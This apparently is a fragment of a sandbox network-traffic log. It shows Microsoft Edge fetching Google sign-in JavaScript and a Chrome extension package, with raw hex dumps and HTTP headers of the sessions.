2024-07-26 15:57:24 UTC	1390	IN	Data Raw: 85 c2 d9 4d af 71 b8 1e 37 e0 46 7d 96 5b 3e 8f 3a b3 83 38 c7 c5 39 61 da 7e 3a 5c 05 7d c3 d3 37 8d be 65 72 41 dd 05 dd 6d b0 47 f7 12 f6 e9 7e e0 d8 95 c7 2b d0 93 01 ce 96 45 bd ae 4b ab ad 5b 4a 0c d6 7b a7 e7 02 3d 0f 7c 8d 8b 7a 3d 81 5b b8 fd f9 4f b9 3c 79 bf c3 7c ad 02 de a0 46 3a e9 66 b2 36 55 c6 56 21 08 2d d8 45 45 95 75 7c c4 37 05 41 38 70 73 43 7a 68 a3 85 02 a1 c2 35 82 cc b0 b4 1d 1d 67 3f 56 1d 59 c3 72 36 e2 f9 e2 7e 0e f1 c0 52 8e a0 ca c2 2e e5 c8 4e b6 20 53 70 41 56 3c 3c 42 86 51 05 8b 87 04 c9 2e 75 1a d3 bc 10 52 a8 40 09 06 6c 40 89 50 dd ef f0 c0 24 21 72 5e 11 7b 1a 65 15 d2 47 d9 fa 64 88 48 1a 4c e7 d8 d8 d1 b4 7a 07 b6 ae 2e 85 86 5b bf 04 23 15 8d 08 a6 03 ac 71 af ce 1e 35 99 a7 b4 90 d0 a0 8d 4e 1f 0c 73 95 64 42 fb Data Ascii: Mq7F}[>:89a~:\}7erAmG~+EK[J{=\|z=[O<y\|F:f6UV!-EEu\|7A8psCzh5g?VYr6~R.N SpAV<<BQ.uR@l@P$!r^{eGdHLz.[#q5NsdB
2024-07-26 15:57:24 UTC	1390	IN	Data Raw: cb 8d ea 4d b7 6a d0 77 f5 a9 ab 67 ba 5d ff 83 3b b0 75 0d 9e 08 0e d1 96 06 1e 8a 5e a4 2c 60 44 8b b8 ed 98 d3 14 07 a0 38 61 4f 16 1d 38 5b 84 cb 0d 47 ee 38 f1 88 32 9e bc e8 f2 8e ce 7c 2d c3 12 74 47 0b b6 1c b2 c2 2a 48 84 81 ad c6 5d 24 b4 28 3c 44 c3 13 f3 bf a7 58 f1 b4 25 50 90 4a 94 84 96 2c 15 4f 9a 1c 48 ae 61 26 0f 5a 3e c8 1a fc a9 58 a2 00 5a 61 0b 15 bd b4 86 52 58 6a 3d 81 ca e2 32 1b 6c a4 a3 e2 97 20 db ec 85 35 68 24 b4 cf 7e a6 1d cc e0 d1 7d e6 f8 5e 37 66 80 93 d3 c7 61 3e 16 f7 42 2f 3b 6c 3f c3 f6 4b b2 b1 69 1e af 59 8e 7a f3 8d 0a 81 37 f0 8d 21 f0 07 62 6f 91 78 87 d8 78 94 f8 d3 7b 16 fe c2 d8 04 26 3e 60 6c 32 4d c6 61 2c 2c b3 e8 30 f9 0c 45 89 62 c5 14 30 1a db 82 d7 0c 4e e2 53 89 d9 51 c9 19 93 32 4f aa 8b 9d 74 b1 93 Data Ascii: Mjwg];u^,`D8aO8[G82\|-tG*H]$(<DX%PJ,OHa&Z>XZaRXj=2l 5h$~}^7fa>B/;l?KiYz7!boxx{&>`l2Ma,,0Eb0NSQ2Ot
2024-07-26 15:57:24 UTC	1390	IN	Data Raw: 2c f3 a1 19 84 d7 af d8 df 5c 35 5a b0 ef 4d db 1e e6 80 7c 51 aa f9 b8 66 4c ed 5e 8d c9 9e eb 9c 93 6a 57 4e 5b 78 f6 ca 2b 9e ae 7b 22 d7 0c d0 e9 8a 3b 39 65 98 0e 87 00 bb c5 7d 93 91 37 52 ab e7 69 56 b1 2e b1 9f 65 55 9b e3 95 e3 c5 cd da ab c5 72 ca aa 2d 53 6a 61 7c b0 98 12 5a 98 a4 ca 37 ef 66 e6 b2 0a 55 02 f3 f5 2d 54 aa 7e 39 cf c5 c3 b7 4c 0f 33 85 15 5f aa 19 8d 84 a1 0b 45 58 45 62 10 90 0b c0 6d 8a a0 07 6a 9c 6b 1f 47 8d b1 b5 30 95 5b 75 ad 11 8c d8 22 9c 8b ba 04 19 3c 4c 3e b4 5e 56 93 40 cb a1 0a 80 05 79 e7 76 b6 43 bb c9 cc 1f e1 41 35 ec 54 bb 81 06 ce b3 37 98 0a 0c 0a 34 c2 da 8a d7 00 54 58 b1 89 1c 6d c2 f0 12 a8 70 4d e1 85 86 dd 64 97 03 76 d8 49 38 d6 b5 52 f8 cb ee dd 72 96 ee e9 10 40 4a 21 3c 5e cc 02 a3 b2 d0 92 0f 6f Data Ascii: ,\5ZM\|QfL^jWN[x+{";9e}7RiV.eUr-Sja\|Z7fU-T~9L3_EXEbmjkG0[u"<L>^V@yvCA5T74TXmpMdvI8Rr@J!<^o
2024-07-26 15:57:24 UTC	1390	IN	Data Raw: 5c 67 d3 86 5a 06 0c da 8f e0 9a f4 a8 f8 33 d3 ed c1 7d 5d 18 9d a5 f1 c4 1b 3c be f8 51 40 72 a3 40 1f 60 09 14 ea 1f ce 59 10 cc 65 6d 68 68 06 dd 2c 9a 56 8b 6f 25 4d d4 6c 33 c6 57 f5 36 2f a8 7a 6d 6c 8e 48 aa 04 2e a8 b4 b3 6f 29 26 29 7a 95 57 2c 9c d1 ba 73 18 f4 63 37 dd 1a 69 c7 9b b8 46 eb 6d 23 d6 48 55 b5 96 14 4f 3c e5 54 0b 54 e3 52 5c dc 43 b6 34 e7 50 05 5c 63 4d 82 72 aa fc 90 4f 6a b8 0a ca cd c2 a1 46 97 dd 14 50 c1 77 12 d2 54 c7 45 cb 62 bc ec 9e 4e ac 3a 05 4d 39 f3 f2 fb 4e a1 ab 16 79 03 b6 62 fc fa 6a ec ca 27 85 ce bc f2 c7 95 98 0a 83 0e 3e f3 aa 9f 10 84 53 f6 68 f2 f6 cc ab 7f b4 05 6e a1 42 4a e8 9a 03 97 1e d4 74 63 16 4d 98 9e fc 90 07 79 98 de 3c ca e3 3c 49 5f 9e e6 59 7e 4c 7f 7e ca f3 bc c8 40 5e c2 6c 09 33 98 9f a3 Data Ascii: \gZ3}]<Q@r@`Yemhh,Vo%Ml3W6/zmlH.o)&)zW,sc7iFm#HUO<TTR\C4P\cMrOjFPwTEbN:M9Nybj'>ShnBJtcMy<<I_Y~L~@^l3
2024-07-26 15:57:24 UTC	1390	IN	Data Raw: 51 ef 35 83 5e 1f ff 57 33 7e ab 99 ec 95 62 d4 2f 6f 94 f5 13 65 bd f7 47 bb 40 6c ee 73 6d 7f d1 3b 4b f6 a1 de fa ea ec ff 9f 5f 68 87 cd 4d 38 fa c3 4b 81 76 b9 39 5c 33 dd 27 cb c3 f5 36 3d c6 37 6a ae 3f 9e bd 54 3f f2 dc 34 37 9f f6 d6 ef 55 7b 6d f6 5c 3b d6 9f 9e 3d d0 ce 9f 69 b7 9e 69 df fd 4f 18 c5 e5 c5 93 dc 6a 9f 0f fa 9f 48 9e ea e9 73 7d 75 a3 7f f2 37 59 dc ff dc 95 f1 f9 d9 ae 77 7d 53 4d 5e 57 57 6f 7d 93 f3 73 36 f9 5a fc 62 58 be 1e 59 fc f3 b7 7a eb 3f 0a f7 7b 54 fb 9e ec 7d 6f fd 60 ea cf df 7b 61 49 fd a0 ea f0 0b b7 e3 cf e6 78 16 75 a6 20 70 75 56 f8 d1 93 09 a4 a0 f6 e8 d1 54 a9 c1 dd cb bf 8d 52 ff 01 02 a3 80 82 c6 df 31 c4 b6 ff 01 dc 01 98 42 08 e6 e7 1d 5c 70 c9 bf 7f 55 7e e9 a0 65 af 1d ad b5 58 7f 2f 44 64 aa 65 45 cb Data Ascii: Q5^W3~b/oeG@lsm;K_hM8Kv9\3'6=7j?T?47U{m\;=iiOjHs}u7Yw}SM^WWo}s6ZbXYz?{T}o`{aIxu puVTR1B\pU~eX/DdeE
2024-07-26 15:57:24 UTC	1390	IN	Data Raw: a0 0a 5e 74 58 97 3a a2 67 6c 28 cd 0d 01 d0 02 cf a3 9c a9 f1 5e 52 19 aa 6f 87 43 d2 a0 d1 82 71 e9 82 d6 40 9a 26 37 6e 2e 6d f9 08 d5 77 ac 91 ea 9a a1 30 5d ee 34 74 02 7f 4c ba a7 fd 1e cb 9a 6a e0 c6 c5 4c ba 44 69 60 7b 9b 42 38 9b e6 ed 6a 28 3c 0d 43 2c 64 b2 9a 08 9d 63 a1 bc 2e 6f d2 cc 50 f2 ec 0e dc 07 0a 75 91 7a 2b ef 2d 34 ae 78 67 a2 ea 54 a7 2a 73 42 0c d0 cb e0 50 bd 81 9e eb 59 79 5a 77 5e 2f c3 6f 38 b0 0c 36 6e 2b 73 83 b8 b4 d3 43 10 25 42 29 6c 7b e4 93 fd 37 7a 7c 4d ed 5e 5e 60 df d2 da ac dc 6a 43 90 6b 92 db 4c 73 7c f9 65 cb ba 65 35 23 69 56 57 3f 1f 49 98 88 8c 84 62 f6 4f bf 6e c9 42 ce 08 49 22 92 b4 68 59 ca 42 98 f1 52 9a 72 b3 db 59 fb 97 4a 5a f7 de 2d 56 fc c1 12 38 43 f0 1d 99 cb 52 08 34 b6 89 b6 20 2f 75 8d f9 a3 Data Ascii: ^tX:gl(^RoCq@&7n.mw0]4tLjLDi`{B8j(<C,dc.oPuz+-4xgT*sBPYyZw^/o86n+sC%B)l{7z\|M^^`jCkLs\|ee5#iVW?IbOnBI"hYBRrYJZ-V8CR4 /u

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	61248	142.250.65.163	443	7736	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 15:57:24 UTC	1045	OUT	GET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_GB.N1bNysriJnk.es5.O/am=BB0MYXQbgUA8nAM9QCkQMgAAAAAAAAAAaAMAAJgB/d=1/excm=_b,_tp,identifierview/ed=1/dg=0/wt=2/ujg=1/rs=AOaEmlEjXkpY1miL806lUCCtQlrHu-H96g/m=_b,_tp HTTP/1.1 Host: www.gstatic.com Connection: keep-alive sec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132", "Google Chrome";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://accounts.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-07-26 15:57:24 UTC	943	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/boq-infra/identity-boq-js-css-signers Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="boq-infra/identity-boq-js-css-signers" Report-To: {"group":"boq-infra/identity-boq-js-css-signers","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/boq-infra/identity-boq-js-css-signers"}]} Content-Length: 239803 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Fri, 26 Jul 2024 15:56:15 GMT Expires: Sat, 26 Jul 2025 15:56:15 GMT Cache-Control: public, immutable, max-age=31536000 Last-Modified: Wed, 24 Jul 2024 00:32:35 GMT Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding, Origin Age: 69 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-07-26 15:57:24 UTC	447	IN	Data Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 41 63 63 6f 75 6e 74 73 53 69 67 6e 49 6e 55 69 3d 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 41 63 63 6f 75 6e 74 73 53 69 67 6e 49 6e 55 69 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 74 79 70 65 6f 66 20 73 65 6c 66 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 73 65 6c 66 3a 74 68 69 73 29 2e 5f 46 5f 74 6f 67 67 6c 65 73 3d 61 7c 7c 5b 5d 7d 3b 28 30 2c 5f 2e 5f 46 5f Data Ascii: "use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi\|\|{};(function(_){var window=this;try{_._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a\|\|[]};(0,_._F_
2024-07-26 15:57:24 UTC	1390	IN	Data Raw: 2a 0a 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 0a 2a 2f 0a 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 32 30 32 34 20 47 6f 6f 67 6c 65 2c 20 49 6e 63 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 4d 49 54 0a 2a 2f 0a 76 61 72 20 62 61 61 2c 64 61 61 2c 67 61 61 2c 6c 61 61 2c 6f 61 61 2c 63 62 2c 64 62 2c 67 62 2c 4a 62 2c 4c 62 2c 4d 62 2c 79 61 61 2c 7a 61 61 2c 4e 62 2c 41 61 61 2c 42 61 61 2c 43 61 61 2c 52 62 2c 57 62 2c 47 61 61 2c 49 61 61 2c 4b 61 61 2c 4f 61 61 2c 24 62 2c 61 63 2c 51 61 61 2c 52 61 61 2c 56 61 61 2c 63 62 61 2c 64 62 61 2c 68 62 61 2c 6b 62 61 2c 65 62 61 2c 6a 62 61 2c 69 62 61 2c 67 62 61 2c 66 62 61 2c 6c 62 61 2c 76 63 Data Ascii: * SPDX-License-Identifier: Apache-2.0// Copyright 2024 Google, Inc SPDX-License-Identifier: MIT*/var baa,daa,gaa,laa,oaa,cb,db,gb,Jb,Lb,Mb,yaa,zaa,Nb,Aaa,Baa,Caa,Rb,Wb,Gaa,Iaa,Kaa,Oaa,$b,ac,Qaa,Raa,Vaa,cba,dba,hba,kba,eba,jba,iba,gba,fba,lba,vc
2024-07-26 15:57:24 UTC	1390	IN	Data Raw: 6f 6e 28 61 2c 62 2c 63 29 7b 62 3d 5f 2e 71 61 28 61 2c 62 2c 63 29 3b 72 65 74 75 72 6e 20 62 3c 30 3f 6e 75 6c 6c 3a 74 79 70 65 6f 66 20 61 3d 3d 3d 22 73 74 72 69 6e 67 22 3f 61 2e 63 68 61 72 41 74 28 62 29 3a 61 5b 62 5d 7d 3b 0a 5f 2e 71 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 66 6f 72 28 76 61 72 20 64 3d 61 2e 6c 65 6e 67 74 68 2c 65 3d 74 79 70 65 6f 66 20 61 3d 3d 3d 22 73 74 72 69 6e 67 22 3f 61 2e 73 70 6c 69 74 28 22 22 29 3a 61 2c 66 3d 30 3b 66 3c 64 3b 66 2b 2b 29 69 66 28 66 20 69 6e 20 65 26 26 62 2e 63 61 6c 6c 28 63 2c 65 5b 66 5d 2c 66 2c 61 29 29 72 65 74 75 72 6e 20 66 3b 72 65 74 75 72 6e 2d 31 7d 3b 5f 2e 74 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 28 30 2c 5f 2e 73 61 29 28 61 2c 62 29 3e Data Ascii: on(a,b,c){b=_.qa(a,b,c);return b<0?null:typeof a==="string"?a.charAt(b):a[b]};_.qa=function(a,b,c){for(var d=a.length,e=typeof a==="string"?a.split(""):a,f=0;f<d;f++)if(f in e&&b.call(c,e[f],f,a))return f;return-1};_.ta=function(a,b){return(0,_.sa)(a,b)>
2024-07-26 15:57:24 UTC	1390	IN	Data Raw: 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 3d 3d 3d 62 7d 3b 5f 2e 65 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 7b 7d 3b 28 30 2c 5f 2e 4e 61 29 28 61 2c 66 75 6e 63 74 69 6f 6e 28 64 2c 65 29 7b 63 5b 62 2e 63 61 6c 6c 28 76 6f 69 64 20 30 2c 64 2c 65 2c 61 29 5d 3d 64 7d 29 3b 72 65 74 75 72 6e 20 63 7d 3b 0a 67 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 2e 4f 61 3f 61 28 5f 2e 4f 61 29 3a 66 61 61 2e 70 75 73 68 28 61 29 7d 3b 5f 2e 53 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 21 5f 2e 4f 61 26 26 5f 2e 51 61 26 26 5f 2e 68 61 61 28 28 30 2c 5f 2e 51 61 29 28 29 29 3b 72 65 74 75 72 6e 20 5f 2e 4f 61 7d 3b 5f 2e 68 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 2e 4f 61 3d 61 3b 66 61 61 2e 66 6f 72 45 61 63 68 28 66 75 6e Data Ascii: (a,b){return a===b};_.eaa=function(a,b){var c={};(0,_.Na)(a,function(d,e){c[b.call(void 0,d,e,a)]=d});return c};gaa=function(a){_.Oa?a(_.Oa):faa.push(a)};_.Sa=function(){!_.Oa&&_.Qa&&_.haa((0,_.Qa)());return _.Oa};_.haa=function(a){_.Oa=a;faa.forEach(fun
2024-07-26 15:57:24 UTC	1390	IN	Data Raw: 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 7b 76 61 6c 75 65 4f 66 3a 61 7d 2e 76 61 6c 75 65 4f 66 28 29 7d 3b 64 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 74 6f 53 74 72 69 6e 67 28 29 2e 69 6e 64 65 78 4f 66 28 22 60 22 29 3d 3d 3d 2d 31 7d 3b 0a 5f 2e 66 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 65 62 29 72 65 74 75 72 6e 20 61 2e 61 61 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 22 47 22 29 3b 7d 3b 67 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 70 61 61 28 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d Data Ascii: b=function(a){return{valueOf:a}.valueOf()};db=function(a){return a.toString().indexOf("`")===-1};_.fb=function(a){if(a instanceof _.eb)return a.aa;throw Error("G");};gb=function(a){return new paa(function(b){return b.substr(0,a.length+1).toLowerCase()===
2024-07-26 15:57:24 UTC	1390	IN	Data Raw: 6d 65 6e 74 2e 64 65 66 61 75 6c 74 56 69 65 77 7c 7c 77 69 6e 64 6f 77 29 3b 62 26 26 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 6f 6e 63 65 22 2c 62 29 7d 3b 5f 2e 41 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 2e 73 72 63 3d 5f 2e 7a 62 28 62 29 3b 5f 2e 79 62 28 61 29 7d 3b 5f 2e 42 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 5f 2e 69 62 28 62 29 3b 62 21 3d 3d 76 6f 69 64 20 30 26 26 28 61 2e 68 72 65 66 3d 62 29 7d 3b 5f 2e 43 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 5f 2e 69 62 28 62 29 3b 62 21 3d 3d 76 6f 69 64 20 30 26 26 61 2e 72 65 70 6c 61 63 65 28 62 29 7d 3b 0a 5f 2e 44 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 5f 2e 65 61 2e 6e 61 76 69 67 61 74 6f 72 3b 72 65 74 75 72 6e 20 61 26 26 28 Data Ascii: ment.defaultView\|\|window);b&&a.setAttribute("nonce",b)};_.Ab=function(a,b){a.src=_.zb(b);_.yb(a)};_.Bb=function(a,b){b=_.ib(b);b!==void 0&&(a.href=b)};_.Cb=function(a,b){b=_.ib(b);b!==void 0&&a.replace(b)};_.Db=function(){var a=_.ea.navigator;return a&&(
2024-07-26 15:57:24 UTC	1390	IN	Data Raw: 62 29 2c 63 5b 31 5d 3d 3d 22 37 2e 30 22 29 69 66 28 62 26 26 62 5b 31 5d 29 73 77 69 74 63 68 28 62 5b 31 5d 29 7b 63 61 73 65 20 22 34 2e 30 22 3a 61 3d 22 38 2e 30 22 3b 62 72 65 61 6b 3b 63 61 73 65 20 22 35 2e 30 22 3a 61 3d 22 39 2e 30 22 3b 62 72 65 61 6b 3b 63 61 73 65 20 22 36 2e 30 22 3a 61 3d 22 31 30 2e 30 22 3b 62 72 65 61 6b 3b 63 61 73 65 20 22 37 2e 30 22 3a 61 3d 22 31 31 2e 30 22 7d 65 6c 73 65 20 61 3d 22 37 2e 30 22 3b 65 6c 73 65 20 61 3d 63 5b 31 5d 3b 62 3d 61 7d 65 6c 73 65 20 62 3d 22 22 3b 72 65 74 75 72 6e 20 62 7d 76 61 72 20 64 3d 52 65 67 45 78 70 28 22 28 5b 41 2d 5a 5d 5b 5c 5c 77 20 5d 2b 29 2f 28 5b 5e 5c 5c 73 5d 2b 29 5c 5c 73 2a 28 3f 3a 5c 5c 28 28 2e 2a 3f 29 5c 5c 29 29 3f 22 2c 22 67 22 29 3b 63 3d 5b 5d 3b 66 6f Data Ascii: b),c[1]=="7.0")if(b&&b[1])switch(b[1]){case "4.0":a="8.0";break;case "5.0":a="9.0";break;case "6.0":a="10.0";break;case "7.0":a="11.0"}else a="7.0";else a=c[1];b=a}else b="";return b}var d=RegExp("([A-Z][\\w ]+)/([^\\s]+)\\s(?:\$(.?)\$)?","g");c=[];fo
2024-07-26 15:57:24 UTC	1390	IN	Data Raw: 52 62 28 29 3f 5f 2e 47 62 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 22 43 68 72 6f 6d 65 20 4f 53 22 3a 5f 2e 4b 62 28 22 43 72 4f 53 22 29 7d 3b 57 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 45 72 72 6f 72 28 22 4e 22 29 3b 7d 3b 47 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 62 29 3b 72 65 74 75 72 6e 20 61 3d 3d 6e 75 6c 6c 3f 62 3a 61 2b 62 7d 3b 0a 49 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 48 61 61 29 72 65 74 75 72 6e 20 5f 2e 58 62 28 61 29 3b 66 6f 72 28 76 61 72 20 62 3d 22 22 2c 63 3d 30 2c 64 3d 61 2e 6c 65 6e 67 74 68 2d 31 30 32 34 30 3b 63 3c 64 3b 29 62 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f Data Ascii: Rb()?_.Gb.platform==="Chrome OS":_.Kb("CrOS")};Wb=function(){throw Error("N");};Gaa=function(a,b){b=String.fromCharCode.apply(null,b);return a==null?b:a+b};Iaa=function(a){if(!Haa)return _.Xb(a);for(var b="",c=0,d=a.length-10240;c<d;)b+=String.fromCharCo
2024-07-26 15:57:24 UTC	1390	IN	Data Raw: 72 28 29 3b 7d 65 6c 73 65 20 69 66 28 74 79 70 65 6f 66 20 61 3d 3d 3d 22 73 74 72 69 6e 67 22 29 61 3d 61 3f 6e 65 77 20 5f 2e 6a 63 28 61 2c 5f 2e 6b 63 29 3a 5f 2e 69 63 28 29 3b 65 6c 73 65 20 69 66 28 61 2e 63 6f 6e 73 74 72 75 63 74 6f 72 21 3d 3d 5f 2e 6a 63 29 69 66 28 5f 2e 5a 62 28 61 29 29 61 3d 61 2e 6c 65 6e 67 74 68 3f 6e 65 77 20 5f 2e 6a 63 28 64 3f 61 3a 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 61 29 2c 5f 2e 6b 63 29 3a 5f 2e 69 63 28 29 3b 65 6c 73 65 7b 69 66 28 21 62 29 74 68 72 6f 77 20 45 72 72 6f 72 28 29 3b 61 3d 76 6f 69 64 20 30 7d 72 65 74 75 72 6e 20 61 7d 3b 0a 5f 2e 57 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 21 21 61 26 26 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 61 29 3f 61 2e 69 6e 63 Data Ascii: r();}else if(typeof a==="string")a=a?new _.jc(a,_.kc):_.ic();else if(a.constructor!==_.jc)if(_.Zb(a))a=a.length?new _.jc(d?a:new Uint8Array(a),_.kc):_.ic();else{if(!b)throw Error();a=void 0}return a};_.Waa=function(a,b){return!!a&&(Array.isArray(a)?a.inc
2024-07-26 15:57:24 UTC	1390	IN	Data Raw: 26 28 61 3d 30 2c 71 3d 62 29 3b 69 66 28 64 29 7b 74 3d 6c 3b 76 3d 67 3b 7a 3d 72 3b 78 3d 70 3b 66 6f 72 28 76 61 72 20 48 20 69 6e 20 64 29 64 3d 2b 48 2c 69 73 4e 61 4e 28 64 29 7c 7c 0a 64 3e 3d 31 30 32 34 7c 7c 28 74 2d 2d 2c 78 2b 2b 2c 7a 2d 3d 48 2e 6c 65 6e 67 74 68 2c 67 3d 65 28 64 2c 78 29 2b 66 28 74 2c 76 2c 7a 29 2c 67 3c 71 26 26 28 61 3d 31 2b 64 2c 71 3d 67 29 29 7d 72 65 74 75 72 6e 20 61 7d 3b 6a 62 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 72 65 74 75 72 6e 20 63 2b 61 2a 33 2b 28 61 3e 31 3f 61 2d 31 3a 30 29 7d 3b 69 62 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 28 61 3e 31 3f 61 2d 31 3a 30 29 2b 28 61 2d 62 29 2a 34 7d 3b 67 62 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e Data Ascii: &(a=0,q=b);if(d){t=l;v=g;z=r;x=p;for(var H in d)d=+H,isNaN(d)\|\|d>=1024\|\|(t--,x++,z-=H.length,g=e(d,x)+f(t,v,z),g<q&&(a=1+d,q=g))}return a};jba=function(a,b,c){return c+a3+(a>1?a-1:0)};iba=function(a,b){return(a>1?a-1:0)+(a-b)4};gba=function(a,b){return

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	61247	142.251.35.161	443	7736	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 15:57:24 UTC	594	OUT	GET /crx/blobs/AVsOOGgL4EVsLTMzZa-C0yXaDVW5z6pCjWzx7YKwHb9PR6v117H2hbsZgQ2S3VrQetSMoK86b9iY-_-8nYIxIJD4BasJl9SD8IoqvPIbEK9wBlfqTusC6rL6yTYDfaVSn9sAxlKa5bRpPaxsFjcmEK7Nec5bVL7NZYhc/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_80_1_0.crx HTTP/1.1 Host: clients2.googleusercontent.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-07-26 15:57:24 UTC	563	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 135751 X-GUploader-UploadID: AHxI1nOboSdahelgdMxoX-mOhj32Hq8lz1dg6_ej70gKK6JM_5jcpqrl3V349VmZfT0pS4ylYO0 X-Goog-Hash: crc32c=IDdmTg== Server: UploadServer Date: Fri, 26 Jul 2024 15:56:45 GMT Expires: Sat, 26 Jul 2025 15:56:45 GMT Cache-Control: public, max-age=31536000 Age: 39 Last-Modified: Tue, 23 Jul 2024 15:56:28 GMT ETag: 1d368626_ddaec042_86665b6c_28d780a0_b2065016 Content-Type: application/x-chrome-extension Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
